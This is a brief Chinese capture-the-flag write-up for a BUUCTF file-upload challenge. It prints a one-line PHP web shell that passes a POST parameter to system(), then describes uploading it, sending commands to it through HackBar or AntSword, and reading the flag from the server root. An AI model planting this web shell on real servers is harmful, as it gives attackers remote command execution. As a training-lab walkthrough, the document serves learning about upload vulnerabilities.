BUUCTF:BUU UPLOAD COURSE 1[WriteUP]
构造一句话PHP木马
<?php @eval(system($_POST['shell'])); ?>利用eval函数解析$shell的值使得服务器执行system命令
eval函数是无法直接执行命令的,只能把字符串当作php代码解析
这里我们构造的木马是POST的方式上传,那就用MaxHacKBar来执行
创建好的木马上传后记下这个路径:
点击"Load URL"并且把刚才我们上传的文件路径粘贴到后面
接下来把我们要执行的命令以POST的方式赋值给shell就可以命令执行了
最后也是在根目录下找到了flag
cat一下flag
经测试这里发现直接用一句话木马,用蚁剑连接也是可以成功的
也是可以在根目录找到flag
